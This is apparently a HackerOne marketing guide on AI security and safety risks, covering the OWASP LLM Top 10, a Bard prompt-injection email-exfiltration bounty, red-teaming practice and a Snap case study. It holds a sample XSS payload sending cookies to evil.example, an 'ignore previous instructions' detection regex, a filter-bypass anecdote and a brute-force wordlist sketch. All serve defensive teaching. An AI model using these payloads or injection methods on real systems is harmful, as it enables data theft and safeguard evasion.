The Ultimate Guide
to Managing Ethical
and Security
Risks in AI
Contents

Introduction
The Current State of AI
Offensive AI Is Outpacing Defensive AI
Attack Surfaces Are Growing Exponentially
The Regulatory Landscape and Business Imperatives Are Evolving
The Risks: Top Vulnerabilities Affecting AI and Large Language Models
AI Safety vs. AI Security
The OWASP Top 10 Vulnerabilities for Large Language Model Applications
Real-World AI Hacking
The Opportunities: Collaborating with Hackers to Build and Deploy AI Quickly and Securely
Why Hackers Are the AI Experts You Need
The Top Generative AI and LLM Risks According to Hackers
The Evolution of Ethical Hackers in the Age of Generative AI
The Solution: AI Red Teaming
HackerOne's Playbook for AI Red Teaming
HackerOne AI Red Teaming Capabilities
Impact and Results
Case Study: Snap, Inc.
The Challenge: AI Safety for Text-to-Image Technology
The Solution: Bug Bounty Model for Scalability
The Result: Snap's Legacy of Increased AI Safety
Hai: Your AI Assistant in the HackerOne Platform
Effortless SAST / DAST Template Generation
Clear and Synthesized Vulnerability Insights
Tailored Remediation Advice
Efficient Hacker Communication
Hai API
Change the Future of AI With Us
Checklist for Implementing Safe and Secure AI
Introduction

Artificial intelligence (AI) is swiftly revolutionizing software development and deployment across various sectors. At HackerOne, our direct customer engagements provide unique insights into this evolution, characterized by a constant stream of AI-powered innovations. This transformation is led by two key groups: AI developers and AI integrators. Developers are at the forefront of creating foundational AI technologies, including generative AI (GenAI) models, natural language processing, and large language models (LLMs). Meanwhile, integrators like our customers Snap, Instacart, CrowdStrike, Priceline, Cloudflare, X (Twitter), and Salesforce typically incorporate these AI advancements into their offerings. Both developers and integrators are dedicated to pushing AI forward in a manner that is innovative and safeguarded against emerging threats, ensuring that AI technologies remain competitive, ethical, and secure.

As we edge closer to a future where AI is ubiquitous, it's essential to consider its impact on various teams, including those focused on security, trust, and compliance. What challenges and risks do these teams encounter, and how can AI help solve endemic issues in these fields? This guide is designed to tackle these critical questions based on HackerOne's experience and insights within the evolving AI landscape.

Key Takeaways

The current state of AI
Offensive AI is outpacing defensive AI, attack surfaces are growing exponentially, and regulatory agencies are trying to keep pace with the power of this technology. Understand some of the ways bad actors are taking advantage of this technology.

The risks
While AI brings positive advancements, it also creates risks that individuals and organizations need to prepare for. Learn about the safety and security risks inherent in GenAI.

The opportunities
Hackers are the experts the world needs to ensure AI is developed and deployed safely, securely, and responsibly. Who's better equipped to safeguard new technology than those specializing in breaking it? Meet some of the 53% of hackers who are already using AI in some way to keep organizations secure.

The solution
AI red teaming is the optimal solution for AI safety and security—and in some areas, it's already mandated. Learn how HackerOne's AI red teaming solution has generated impactful results for customers.
The Current State of AI
Two primary shifts are taking place in the wake of increasing AI prominence: the
dominance of offensive AI and the rapid expansion of the attack surface.
Offensive AI Is Outpacing Defensive AI

In the short term, and possibly indefinitely, offensive or malicious AI applications are outpacing defensive ones using AI for stronger security. This is not a new phenomenon: the offense vs. defense cat-and-mouse game defines cybersecurity.

While GenAI offers tremendous opportunities to advance defensive use cases, cybercrime rings and malicious attackers will not let the AI opportunity pass either. They will level up their weaponry, potentially asymmetrically, to defensive efforts—meaning there isn't an equal match between the two. Attacks like social engineering via deepfakes will be more convincing and fruitful than ever. GenAI lowers the barrier to entry, and phishing is getting even more convincing.

Have you ever received a text from a random number claiming to be your CEO, asking you to buy 500 gift cards? While you're unlikely to fall for that trick, how would it differ if that request came as a call from your CEO's phone number? What if it sounded exactly like your CEO, and the voice even responded to your questions in real time? That's the power of AI voice cloning. Check out this Q&A with HackerOne senior solutions architect and AI hacker Dane Sherrets to see it unravel live.
Attack Surfaces Are
Growing Exponentially
We're seeing an explosion in new attack surfaces. Defenders have long followed the principle of attack surface reduction, a term Microsoft coined—the aim being to protect your organization's devices and network by leaving attackers with fewer ways to execute attacks. However, the rapid commoditization of GenAI is going to reverse some of the attack surface reduction progress.

The ability to generate code with GenAI dramatically lowers the bar for who can be a software engineer, resulting in more and more code being shipped by people who do not fully comprehend the technical implications of the software they develop, let alone oversee the security implications.

Additionally, GenAI requires vast amounts of data. It's no surprise that the models that continue to impress us with human levels of intelligence happen to be the largest models. In a GenAI-ubiquitous future, organizations of all kinds will accumulate more and more data, beyond what we may now think possible. Therefore, the sheer scale and impact of data breaches will grow out of control. Attackers are more motivated than ever to get their hands on data. The dark web price of data "per kilogram" is increasing.

Attack surface growth doesn't stop there: in just the past few months, businesses have rapidly implemented features and capabilities powered by GenAI. As with any emerging technology, developers may not be fully aware of the ways their implementation can be exploited or abused. Novel attacks against applications powered by GenAI are emerging as a new threat that defenders have to worry about.
The Regulatory Landscape and Business
Imperatives Are Evolving
As regulatory requirements and business imperatives surrounding AI testing become more prevalent, organizations must seamlessly integrate
AI red teaming and alignment testing into their risk management and software development practices. This strategic integration is crucial for
fostering a culture of responsible AI development and ensuring that AI technologies meet security and ethical expectations. Read more about
the regulatory landscape of AI from HackerOne’s chief policy officer.
European Union's AI Act
The European Union recently reached an agreement on the AI Act, which sets several requirements for trust and security for AI. For some high-risk AI systems, requirements include adversarial testing, risk assessment and mitigation, and cyber incident reporting, among other security safeguards.

U.S. Federal Guidance
The EU's AI Act comes on the heels of U.S. federal guidance such as the recent executive order on safe and trustworthy AI, as well as Federal Trade Commission guidance. These frameworks identify AI red teaming and ongoing testing as key safeguards to help ensure security and alignment.
As the boundaries of what’s possible with AI continue to expand, so do the responsibilities of those who wield it. For high-tech companies looking
to deploy GenAI, it’s crucial to adopt a proactive stance on cybersecurity. This means not only keeping pace with regulatory requirements and
integrating robust security measures but also fostering a culture of continuous innovation and ethical consideration. Balancing the drive for
competitive advantage with the imperative for security and safety is key to thriving in the evolving AI climate.
The Risks: Top Vulnerabilities
Affecting AI & Large
Language Models
The pressure to rapidly adopt GenAI to boost productivity and
remain competitive has ramped up to an incredible level.
Concurrently, security leaders are trying to understand how
to leverage GenAI technology while ensuring protection from
inherent security issues and threats. This challenge includes
staying ahead of adversaries who may discover and exploit
malicious uses before organizations can address them.
AI Safety vs. AI Security

AI safety focuses on preventing AI systems from generating harmful content, from instructions for creating weapons to offensive language and inappropriate imagery. It aims to ensure responsible use of AI and adherence to ethical standards.

AI safety risks to organizations can result in:
Spread of biased or unethical decision-making
Erosion of public trust in AI technologies and the organizations that deploy them
Legal, regulatory, and financial liabilities for non-compliance with ethical standards
Unintended consequences that could harm individuals or society

On the other hand, AI security involves testing AI systems with the goal of preventing bad actors from abusing the AI to, for example, compromise the confidentiality, integrity, or availability of the systems the AI is embedded in.

AI security risks to organizations can result in:
Disclosing sensitive or private information
Providing access and functionality to unauthorized users
Compromising a model's security, effectiveness, and ethical behavior
Doing extensive financial and reputational damage
The OWASP Top 10 Vulnerabilities for Large Language Model Applications

The Open Web Application Security Project (OWASP) annually releases a number of comprehensive guides, including the "Top 10 for LLM Applications," about the most critical security risks to large language model (LLM) applications. HackerOne is proud to have had two team members contribute to this important initiative. Check out the HackerOne blog for a deeper look into the introduction and mitigation of these vulnerabilities.

#1 Prompt injection
The most commonly discussed LLM vulnerability, in which an attacker manipulates the operation of a trusted LLM through crafted inputs, either directly or indirectly.

#2 Insecure output handling
Occurs when an LLM output is accepted without scrutiny, potentially exposing backend systems. This can, in some cases, lead to severe consequences like XSS, CSRF, SSRF, privilege escalation, or remote code execution.

#3 Training data poisoning
Refers to the manipulation of training data or fine-tuning processes to introduce vulnerabilities, backdoors, or biases that could compromise the model's security, effectiveness, or ethical behavior.

#4 Model denial of service
Happens when attackers trigger resource-heavy operations on LLMs, leading to service degradation or high costs.
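To make the insecure output handling item (#2) above concrete, here is a minimal sketch, assuming a Python web backend: treat model output as untrusted input and encode it before it reaches an interpreter such as a browser. The render_comment helper and the canned model_output are illustrative, not part of any real product.

```python
import html

def render_comment(model_output: str) -> str:
    """Escape LLM output before embedding it in an HTML page."""
    return f"<div class='summary'>{html.escape(model_output)}</div>"

# An attacker-influenced completion that would run as script if it were
# concatenated into the page unescaped.
model_output = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
print(render_comment(model_output))  # the payload renders as inert text
```

The same principle applies to any downstream consumer: parameterize SQL, shell-escape commands, and validate URLs before an LLM's output touches them.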
#5 Supply chain vulnerabilities
The supply chain in LLMs can be vulnerable, impacting the integrity of training data, machine learning (ML) models, and deployment platforms. Supply chain vulnerabilities in LLMs can lead to biased outcomes, security breaches, and even complete system failures.

#6 Sensitive information disclosure
Happens when LLMs inadvertently reveal confidential data, resulting in the exposure of proprietary algorithms, intellectual property, and private or personal information, leading to privacy violations and other security breaches.

#7 Insecure plugin design
The power and usefulness of LLMs can be extended with plugins. However, this does come with the risk of introducing more vulnerable attack surfaces through poor or insecure plugin design.

#8 Excessive agency
Typically caused by excessive functionality, permissions, and/or autonomy. One or more of these factors enables damaging actions to be performed in response to unexpected or ambiguous outputs from an LLM.

#9 Overreliance
When systems or people depend on LLMs for decision-making or content generation without sufficient oversight. Organizations and the individuals that comprise them can over-rely on LLMs without the knowledge and validation mechanisms required to ensure information is accurate, vetted, and secure.

#10 Model theft
Where there is unauthorized access, copying, or exfiltration of proprietary LLM models. This can lead to economic loss, reputational damage, and unauthorized access to highly sensitive data.
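As one hedged illustration of mitigating excessive agency (#8), the sketch below routes every LLM-requested tool call through an explicit allowlist and requires human approval for privileged actions. The tool names and the approve callback are hypothetical placeholders, not a real agent framework.

```python
from typing import Callable, Dict

READ_ONLY_TOOLS: Dict[str, Callable[[str], str]] = {
    "search_docs": lambda query: f"results for {query!r}",
}
PRIVILEGED_TOOLS: Dict[str, Callable[[str], str]] = {
    "delete_record": lambda record_id: f"deleted {record_id}",
}

def dispatch(tool: str, arg: str, approve: Callable[[str], bool]) -> str:
    """Route an LLM-requested tool call through least-privilege checks."""
    if tool in READ_ONLY_TOOLS:
        return READ_ONLY_TOOLS[tool](arg)
    if tool in PRIVILEGED_TOOLS:
        # Privileged actions never run on model output alone.
        if approve(f"LLM requested {tool}({arg!r}). Allow?"):
            return PRIVILEGED_TOOLS[tool](arg)
        return "denied: human approval required"
    return f"denied: unknown tool {tool!r}"

print(dispatch("search_docs", "vpn config", approve=lambda _: False))
print(dispatch("delete_record", "42", approve=lambda _: False))
```

Keeping destructive capability out of the model's direct reach bounds the damage an unexpected or manipulated output can cause.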
Real-World AI Hacking
Ethical hackers now specialize in finding vulnerabilities in AI models and deployments. In fact, 62% of hackers in HackerOne's annual survey said they plan to specialize in the OWASP Top 10 for LLM Applications. Hackers Joseph "rez0" Thacker, Justin "Rhynorater" Gardner, and Roni "Lupin" Carta collaborated to strengthen Google's AI red teaming by hacking its GenAI assistant, Bard—now called Gemini.

The launch of Bard's Extensions AI feature provided Bard with access to Google Drive, Google Docs, and Gmail. This meant Bard would have access to personally identifiable information and could even read emails and access documents and locations. The hackers identified that Bard analyzed untrusted data and could be susceptible to insecure direct object reference (IDOR) and data injection attacks, which can be delivered to users without their consent.

In less than 24 hours from the launch of Bard Extensions, the hackers were able to demonstrate that:
Google Bard was vulnerable to IDOR and data injection attacks via data from Extensions.
Malicious image prompt injection instructions could exploit the vulnerability.
A prompt injection payload could exfiltrate victims' emails.

With such a powerful impact as the exfiltration of personal emails, the hackers promptly reported this vulnerability to Google, which resulted in a $20,000 bounty award.

Bugs like this only scratch the surface of the novel vulnerabilities found in GenAI. Organizations developing and deploying GenAI and LLMs need security talent specializing in the OWASP Top 10 for LLMs if they are serious about competitively and securely introducing these technologies.
The Opportunities:
Collaborating With Hackers
to Build and Deploy AI
Quickly & Securely
Why Hackers Are the AI Experts You Need

Ethical hackers have been experimenting with AI systems since the day OpenAI announced ChatGPT. Hackers are a collective force of intelligence and experimentation. They are curious and talented individuals whose efforts can be scaled to help organizations deliver or implement AI at a competitive speed and maintain safety and security.

HackerOne's 7th Annual Hacker-Powered Security Report, released in late 2023, surveyed hackers on their use of GenAI and their experience of hacking the technology. Among its findings: 53% of hackers are already using GenAI in some way.
The Top Generative AI and LLM
Risks According to Hackers
HackerOne has ongoing conversations with the hacking
community about its use of AI and the community’s latest
findings so we can keep our customers supplied with the most
up-to-date information and the best talent to support them.
According to hacker Gavin Klondike,
“We’ve almost forgotten the last 30 years of cybersecurity lessons in developing
some of this software.”
The haste of GenAI adoption has clouded many organizations’
judgment when it comes to the security of artificial intelligence.
Security researcher Katie Paxton-Fear, aka @InsiderPhD,
believes,
“This is a great opportunity to take a step back and bake some security in as this
is developing, and not bolting on security 10 years later.”
While the OWASP Top 10 for LLMs is a comprehensive study of the types of vulnerabilities that can affect GenAI models, we spoke to hackers to learn what they encounter most often and which vulnerabilities organizations need to look out for.

Prompt injections

The OWASP Top 10 for LLM Applications defines prompt injection as a vulnerability during which an attacker manipulates the operation of a trusted LLM through crafted inputs, either directly or indirectly. Paxton-Fear warns about prompt injection, saying:

"As we see the technology mature and grow in complexity, there will be more ways to break it. We're already seeing vulnerabilities specific to AI systems, such as prompt injection or getting the AI model to recall training data or poison the data. We need AI and human intelligence to overcome these security challenges."

Joseph Thacker, a.k.a. @rez0, uses this example to help understand the power of prompt injection:

"If an attacker uses prompt injection to take control of the context for the LLM function call, they can exfiltrate data by calling the web browser feature and moving the data that are exfiltrated to the attacker's side. Or, an attacker could email a prompt injection payload to an LLM tasked with reading and replying to emails."

Roni Carta, aka @arsene_lupin, points out that if developers are using ChatGPT to help install packages on their computers, they can run into trouble when asking it to find libraries. Carta says:

"ChatGPT hallucinates library names, which threat actors can then take advantage of by reverse-engineering the fake libraries."

Agent access control

"LLMs are as good as their data," says Thacker. "The most useful data is often private data."

According to Thacker, this creates an extremely difficult problem in the form of agent access control. Access-control issues are very common vulnerabilities found through the HackerOne platform every day. Where access control goes particularly wrong regarding AI agents is the mixing of data. Thacker says AI agents tend to mix second-order data access with privileged actions, exposing the most sensitive information to potential exploitation by bad actors.
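A minimal sketch of the access-control pattern Thacker's point suggests, assuming a Python tool layer: the agent always carries the end user's identity, and the data layer enforces authorization itself rather than trusting the model's judgment. The in-memory DOCUMENTS store and fetch_document helper are hypothetical.

```python
DOCUMENTS = {
    "doc-1": {"owner": "alice", "body": "q3 roadmap"},
    "doc-2": {"owner": "bob", "body": "salary bands"},
}

def fetch_document(doc_id: str, acting_user: str) -> str:
    """Return a document only if the acting user is authorized to read it."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != acting_user:
        # Deny by default; never let the LLM decide access.
        raise PermissionError(f"{acting_user} may not read {doc_id}")
    return doc["body"]

print(fetch_document("doc-1", acting_user="alice"))  # allowed

# A prompt-injected request for bob's document still fails for alice:
try:
    fetch_document("doc-2", acting_user="alice")
except PermissionError as err:
    print(err)
```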
The Evolution of Ethical Hackers in the Age
of Generative AI
Naturally, as new vulnerabilities emerge from the rapid adoption of GenAI and LLMs, the hacker's role is also evolving.

During a panel featuring security experts from Zoom and Salesforce, hacker Tom Anthony predicted the change in how hackers approach processes with AI:

"At a recent Live Hacking Event with Zoom, there were easter eggs for hackers to find—and the hacker who solved them used LLMs to crack them. Hackers are able to use AI to speed up their processes by, for example, extending the word lists when trying to brute-force systems."

He also senses a distinct difference for hackers using automation, claiming AI will significantly uplevel the reading of source code. Anthony says, "Anywhere that companies are exposing source code, there will be systems reading, analyzing, and reporting in an automated fashion."

Hacker Jonathan Bouman uses ChatGPT to help hack technologies he's not super confident with.

"I can hack web applications but not break new coding languages, which was the challenge at one Live Hacking Event. I copied and pasted all the documentation provided (removing all references to the company), gave it all the structures, and asked it, 'Where would you start?' It took a few prompts to ensure it wasn't hallucinating, and it did provide a few low-level bugs. Because I was in a room with 50 ethical hackers, I was able to share my findings with a wider team, and we escalated two of those bugs into critical vulnerabilities. I couldn't have done it without ChatGPT, but I couldn't have made the impact I did without the hacking community."

There are even new tools for learning to hack LLMs—and, therefore, for identifying the vulnerabilities those tools create. Tom Anthony uses "an online game for prompt injection where you work through levels, tricking the GPT model to give you secrets. It's all developing so quickly."
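As a hedged sketch of the word-list technique Anthony mentions above: seed terms from the target's context are expanded with ordinary mangling rules, and a model is asked for context-aware variants. The llm_suggest function is a hypothetical stand-in for whatever model integration you use, stubbed here with placeholder output.

```python
from typing import List

def mangle(seed: str) -> List[str]:
    """Classic rule-based variations of one seed word."""
    suffixes = ["", "1", "123", "2024", "!"]
    cases = {seed.lower(), seed.capitalize(), seed.upper()}
    return [base + suffix for base in cases for suffix in suffixes]

def llm_suggest(seeds: List[str]) -> List[str]:
    """Hypothetical LLM call: ask a model for context-aware variants
    (product names, internal jargon, likely typos). Stubbed here."""
    return [seed + "-staging" for seed in seeds]  # placeholder output

seeds = ["zoom", "meeting"]
wordlist = sorted({w for s in seeds for w in mangle(s)} | set(llm_suggest(seeds)))
print(len(wordlist), "candidate entries")
```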
The Solution:
AI Red Teaming
We've established that ethical hackers are invaluable for finding security holes in AI models and deployments. This section looks at how you can get started with engaging ethical hackers to specifically look for issues that will help you secure your GenAI projects. AI red teaming is the practice of stress-testing AI models and deployments. This can be done with a bug bounty, a pentest, or a time-bound offensive testing challenge.

What is AI red teaming?
AI red teaming is an approach that involves thoroughly examining an AI system, including AI models and their software components, to identify safety and security concerns. This process produces a list of issues and actionable recommendations to fix them, adapting traditional red teaming to the unique challenges of AI.
HackerOne’s
Playbook for AI
Red Teaming
HackerOne partners with
leading technology firms to
evaluate their AI deployments
for safety and security issues.
The ethical hackers selected
for our early AI red teaming
exceeded all expectations. The
insights gleaned have shaped
HackerOne’s evolving playbook
for AI red teaming.
Our approach builds upon a powerful, community-driven offensive testing model, which HackerOne has successfully
offered for over a decade, but with several modifications necessary for optimal AI safety and security engagements.
Team composition and size
A meticulously selected and diverse team is the backbone of an effective assessment. Emphasizing diversity in background, experience, and skill sets is pivotal for safeguarding AI. A blend of curiosity-driven thinkers, individuals with varied experiences, and those skilled in production LLM prompt behavior yields the best results.

Collaboration
Collaboration among AI red teaming members holds unparalleled significance, often exceeding that of traditional security testing. HackerOne has found a team size of 15-25 testers strikes the right balance for effective engagements, bringing in diverse and global perspectives.

Duration
Because AI technology is evolving so quickly, we've found that engagements between 15 and 60 days in duration work best to assess specific aspects of AI red teaming. However, a continuous engagement without a defined end date was adopted in at least a handful of cases. This method of continuous AI red teaming pairs well with an existing bug bounty program.

Context and scope
Unlike traditional security testers, AI red teamers must fully understand the AI system they are assessing. Collaborating closely with customers to establish a comprehensive context and precise scope is essential. This collaboration helps in identifying the AI's intended purpose, deployment environment, existing safety and security measures, and any limitations.

Private vs. public model
While most AI red teams operate in private due to the sensitivity of safety and security issues, in some instances, public engagement, such as X's algorithmic bias bounty challenge, has yielded significant success.

Incentive
Tailoring the incentive model is a critical aspect of the AI red teaming playbook. A hybrid economic model that includes fixed-fee participation rewards in conjunction with rewards for achieving specific outcomes (akin to bounties) has proven most effective.

Empathy and consent
As many safety considerations may involve encountering harmful and offensive content, it is important to seek explicit participation consent from adults (18+ years of age), offer regular support for mental health, and encourage breaks between assessments.
HackerOne AI Red Teaming Capabilities

Strategic & Flexible Scoping
Targeted vulnerability identification tailored to immediate security needs, enabling a custom engagement suited for your unique threat model or criteria. Get strategic resource and skill allocation without long-term commitments.

Rapid Deployment
The quick initiation of security testing programs to address urgent concerns, drawing on the community's expertise for swift, impactful assessment of crucial security areas.

Power of AI + Hackers
A combination of AI/ML expertise with the unique perspectives of our diverse hacker community to uncover and resolve sophisticated vulnerabilities.

Intelligent Copilot
The use of Hai, our proprietary AI chatbot, to enrich vulnerability report analysis and improve dialogue with HackerOne's security researchers.
Impact and Results
Within the HackerOne community, active hackers specialize in prompt hacking and other AI security and safety testing, and a number of those hackers have participated in HackerOne's AI red teaming engagements to date. In a single recent engagement, a team of 18 quickly identified 26 valid findings within the initial 24 hours and accumulated over 100 valid findings in the two-week engagement.
In another notable example, the team put forth a challenge of bypassing significant protections built to prevent the
generation of images containing a swastika, a symbol associated with the Nazi regime during World War II. Given its
offensive nature and potential to promote hate, blocking its appearance in generated content is essential to ensure
ethical and responsible AI usage. A particularly creative hacker on the AI red team was able to swiftly bypass these
protections, and thanks to their discovery, the model has significantly improved its resilience against this type of abuse.
Case Study:
Snap, Inc.
The Challenge:
AI Safety for Text-to-Image Technology
Snap has been developing new AI-powered functionality to expand its users' creativity and wanted to test the new features of its Generative AI Lens and Text2Image products to stress-test the guardrails it had in place to help prevent the creation of harmful content.

This approach involved a new way of thinking about safety. Previously, the industry's focus had been on looking at patterns in user behavior to identify common risk cases. But with text-to-image technology, Snap wanted to assess the model's behavior to understand the rare instances of inappropriate content that flaws in the model could enable.

"We ran the AI red teaming exercise before the launch of Snap's first text-to-image generative AI product. A picture is worth a thousand words, and we wanted to prevent inappropriate or shocking material from hurting our community. We worked closely with Legal, Policy, Content Moderation, and Trust and Safety to design this red-teaming exercise."
— Ilana Arbisser, Technical Lead, AI Safety at Snap Inc.
The Solution: Bug Bounty Model for Scalability

The Safety team had already identified eight categories of harmful imagery they wanted to test for, including violence, sex, self-harm, and eating disorders. Snap knew they wanted to do adversarial testing on the product, and a security expert on their team suggested a bug bounty–style program. From there, we worked together to decide on a "Capture the Flag" (CTF)–style exercise that would incentivize researchers to look for our specific areas of concern.

By setting bounties, we incentivized the Snap community to test the product and to focus on the content they were most concerned about being generated on the platform. Snap and HackerOne adjusted bounties dynamically and continued to experiment with prices to optimize for researcher engagement.

Out of a wide pool of talented researchers, 21 experts from across the globe were selected to participate in the exercise. Global diversity was crucial for covering harmful imagery across different cultures, and the researchers' mindset was key for breaking the models.
The Result: Snap's Legacy of Increased AI Safety

Snap was thorough about the content it wanted researchers to focus on re-creating, providing a blueprint for future engagements. Many organizations have policies against "harmful imagery," but it's subjective and hard to measure accurately. Snap was very specific and descriptive about the type of images it considered harmful to young people. The research and the subsequent findings have created benchmarks and standards that will help other social media companies, which can use the same flags to test for content.
Read the full case study
Hai: Your AI Assistant in the HackerOne Platform

At HackerOne, we embrace the transformative power of AI, focusing on speed and efficiency in securing and advancing our technology. Our commitment extends beyond assisting customers with the risks associated with their AI models and deployments; we fundamentally embed AI's capabilities into our platform's DNA. That's where Hai, HackerOne's GenAI copilot, comes in to enhance the HackerOne platform with powerful AI functionalities.

Hai effortlessly translates natural language into precise queries, enriches vulnerability reports with additional relevant context, and utilizes platform data to generate insightful recommendations. This cutting-edge technology is designed to revolutionize how our customers approach vulnerability response times, aiming to streamline and enhance the efficiency of vulnerability management processes.

"Hai has significantly reduced the time my team spends sifting through bug reports or creating responses, allowing us to focus more on resolving and communicating vulnerabilities quickly."
— Alexander Hagenah, Head of Cyber Controls, SIX Group
Hai’s benefits for customers include:
Effortless SAST / DAST Template Generation
Enhance scanner consistency
with Hai’s tailored templates,
minimizing errors and
boosting detection rates.
Clear and
Synthesized
Vulnerability
Insights
Whether faced with intricate
reports or technical details, Hai
provides easily understandable
explanations of vulnerabilities,
enhancing comprehension and
accelerating analysis.
Tailored Remediation Advice

Determine the best approach to fixing a vulnerability by analyzing it with Hai and receiving personalized remediation advice, facilitating effective security enhancements and speedy remediation.
Efficient Hacker Communication

Ask Hai to craft elegant and succinct messages to hackers on your behalf, enhancing collaboration and communication across language barriers.
“Utilizing Hai for translating
complex vulnerability findings
into remediation advice has been
a game changer for us. It bridges
the gap between our technical
reports and our internal audience,
enhancing the value of our
HackerOne program by making
actionable insights accessible to
everyone.”
— Vice President of Cybersecurity
at a Fortune 500 real estate
services and investment firm
Hai API
Hai is accessible through the
HackerOne API, enabling users
to seamlessly incorporate Hai’s
capabilities into their existing
vulnerability management
processes and tooling.
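For orientation, here is a minimal sketch of calling Hai through the API from Python. HTTP Basic auth with an API token identifier and value is how the HackerOne API authenticates; the /hai/conversations path and payload shape below are illustrative assumptions, so consult the current HackerOne API documentation for the real endpoint and schema.

```python
import requests

API_BASE = "https://api.hackerone.com/v1"
auth = ("your-api-token-identifier", "your-api-token-value")

payload = {
    # Hypothetical payload shape: a natural-language request for Hai.
    "message": "Summarize report #123456 and suggest remediation steps.",
}

# The /hai/conversations path is an assumption for illustration only.
resp = requests.post(f"{API_BASE}/hai/conversations", json=payload,
                     auth=auth, timeout=30)
resp.raise_for_status()
print(resp.json())
```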
The development of services like AI red
teaming and the launch of tools like Hai
represent important steps in improving
cybersecurity defenses as enterprises
deal with a constantly changing world of
cyberthreats. By utilizing AI to strengthen
security processes and expedite
vulnerability response times, we establish
industry standards and lay the groundwork
for a safer and more secure digital future.
Change the
Future of AI
With Us
Emerging technologies are often developed with trust, safety, and security as afterthoughts.
HackerOne is changing the status quo. We are committed to enhancing security through safe, secure, and
confidential AI, tightly coupled with strong human oversight. Our goal is to provide organizations with the
tools they need to achieve security outcomes beyond what has been possible before—and to do it without
compromise.
As the demand for secure and safe AI grows, HackerOne remains dedicated to facilitating a present and
future where technology enhances our lives while upholding security and trust. To learn more about how to
strengthen your AI safety and security with AI red teaming, contact the team at HackerOne.
Checklist for Implementing Safe and Secure AI

Whether your organization is looking to develop, secure, or deploy AI or LLMs, or you're hoping to ensure the security and ethical adherence of your existing model, we've compiled a checklist for implementing safe and secure AI. While not exhaustive for every use case, this checklist can get you started. Ask the experts at HackerOne for more details on safeguarding your AI.

Joint AI safety & security measures:

Red teaming: Incorporate both security and safety AI red teaming as a standard practice for AI models and applications.

Testing: Establish continuous testing, evaluation, verification, and validation throughout the AI model life cycle. Provide regular executive metrics and updates on AI model functionality, security, reliability, and robustness. Regularly scan and update the underlying infrastructure and software for vulnerabilities.

Risk assessment: Conduct comprehensive risk assessments to identify potential risks associated with the AI system, including unintended consequences, negative societal impacts, and misuse or abuse scenarios.

Regulations and governance: Determine country, state, or government-specific AI compliance requirements. Some regulations exist around specific AI features, such as facial recognition and employment-related systems. Establish an AI governance framework outlining roles, responsibilities, and ethical considerations, including incident response planning and risk management.

Input and output security: Evaluate input validation methods, as well as how outputs are filtered, sanitized, and approved (see the sketch after this list).

Training: Train all users on ethics, responsibility, legal issues, AI security risks, and best practices such as warranty, license, and copyright. Establish a culture of open and transparent communication on the organization's use of predictive or generative AI.
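As promised above, a minimal sketch of input and output controls, assuming a Python service wrapping an LLM. The injection patterns and the redaction rule are illustrative starting points, not a complete policy.

```python
import re

MAX_PROMPT_CHARS = 4000
INJECTION_HINTS = re.compile(r"ignore (all )?previous instructions", re.I)

def validate_input(prompt: str) -> str:
    """Reject oversized or obviously malicious prompts before inference."""
    if len(prompt) > MAX_PROMPT_CHARS:
        raise ValueError("prompt too long")
    if INJECTION_HINTS.search(prompt):
        raise ValueError("prompt matches a known injection pattern")
    return prompt

def filter_output(completion: str) -> str:
    """Redact anything resembling a leaked secret before release."""
    return re.sub(r"(?i)(api[_-]?key\s*[:=]\s*)\S+", r"\1[REDACTED]", completion)

print(filter_output("Use api_key=sk-12345 to authenticate."))
# -> Use api_key=[REDACTED] to authenticate.
```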
AI safety measures:

Ethical considerations: Establish clear ethical principles and guidelines for the development and use of AI systems, addressing issues such as bias, transparency, accountability, and respect for human rights.

Human oversight: Incorporate human oversight and control mechanisms into AI systems, allowing for human intervention and decision-making in critical situations.

Explainability and transparency: Ensure that AI systems are explainable and transparent, enabling users and stakeholders to understand how decisions are made and the underlying reasoning.

Continuous monitoring: Establish mechanisms for continuous monitoring of AI systems during operation to detect and respond to any deviations from expected behavior or potential safety concerns.

Responsibility and accountability: Clearly define roles, responsibilities, and accountability measures for the development, deployment, and use of AI systems, including processes for redress and remediation in case of harm or unintended consequences.

Stakeholder engagement: Involve diverse stakeholders, including affected communities, experts, and regulators, in the development and deployment of AI systems to ensure a comprehensive understanding of potential impacts and concerns.

AI security measures:

Data security: Verify how data is classified and protected based on sensitivity, including personal and proprietary business data. Determine how user permissions are managed and what safeguards are in place.

Access control: Implement least-privilege access controls and defense-in-depth measures.

Training pipeline security: Require rigorous control around training data governance, pipelines, models, and algorithms.

Monitoring and response: Map workflows, monitoring, and responses to understand automation, logging, and auditing. Confirm audit records are secure.

Production release process: Include application testing, source code review, vulnerability assessments, infrastructure security, and AI red teaming in the production release process.

Supply chain security: Request third-party audits, penetration testing, and code reviews for third-party providers, both initially and on an ongoing basis.

Measurement: Identify or expand metrics to benchmark generative cybersecurity AI against other approaches to measure expected productivity improvements. Stay updated with the latest advancements in AI security research and best practices.
www.hackerone.com
© HackerOne. All rights reserved.